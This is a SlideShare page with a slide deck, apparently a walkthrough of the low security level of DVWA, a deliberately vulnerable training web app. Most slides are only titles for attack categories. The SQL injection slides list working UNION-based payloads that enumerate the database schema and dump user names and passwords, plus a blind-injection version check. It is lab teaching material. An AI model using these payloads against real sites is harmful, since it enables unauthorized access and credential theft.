O slideshow foi denunciado.
Utilizamos seu perfil e dados de atividades no LinkedIn para personalizar e exibir anúncios mais relevantes. Altere suas preferências de anúncios quando desejar.

Dvwa low level

1.649 visualizações

Publicada em

Dvwa low level

Publicada em: Tecnologia
  • Seja o primeiro a comentar

Dvwa low level

  1. 1. DVWA - Damn Vulnerable Web Application Dvwa low level
  2. 2. 1.Brute Force
  3. 3. 2.Command Injection
  4. 4. 3.CSRF
  5. 5. 4.File Inclusion
  6. 6. 5.SQL Injection
  7. 7. SQL Injection Source
  8. 8. SQL 重組 $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'"; 檢測是否有錯誤 1' and 1=1# 組合後變成 "select first_name,last_name form users where user_id = '1' and 1=1#";
  9. 9. 5.SQL Injection 1' order by 1# 1' union all select 1,2# 1' union all select user(),database()# 1' union all select null,table_name from information_schema.tables# 1' union all select null,table_name from information_schema.tables where table_schema = 'dvwa'# 1' union all select null,column_name from information_schema.columns where table_schema ='dvwa'#
  10. 10. 5.SQL Injection 1' union all select user,password from users#
  11. 11. 6.Blind SQL Injection 差別
  12. 12. 6.Blind SQL Injection 我們可以先 檢測版本 1' union all select null,substring(@@version,1,1)=4#
  13. 13. 7.File Upload
  14. 14. 8.Reflected Cross Site Scripting (XSS)
  15. 15. 9.Stored Cross Site Scripting (XSS)
  16. 16. Dvwa medium level To be continue vance@hst.tw

×